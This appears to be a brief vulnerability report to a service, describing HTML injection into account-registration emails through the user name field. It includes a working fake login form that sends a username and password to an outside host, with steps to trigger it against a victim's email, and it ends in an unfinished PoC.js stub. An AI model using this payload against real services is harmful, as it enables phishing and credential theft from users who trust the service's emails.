Hi i Found a way to inject html in user’s email. So in this case if a attacker set name of victim as html form it will be rendered by your system and then the render html will be sent to the victim
<form action=“https://brutelogic.com.br/poc.svg/” method=“post”> <label for=“username”>Username:</label> <input class=“userbox” type=“text” name=“username”/><br /> <label for=“password”>Password:</label> <input type=“text” name=“password” > <input class=“button” type=“submit” value=“submit” /> </form>
Enter email of victim and create new account
Now goto mail and check you will see our code has been rendered as html
Submit form and xss
// PoC.js var payload = … ```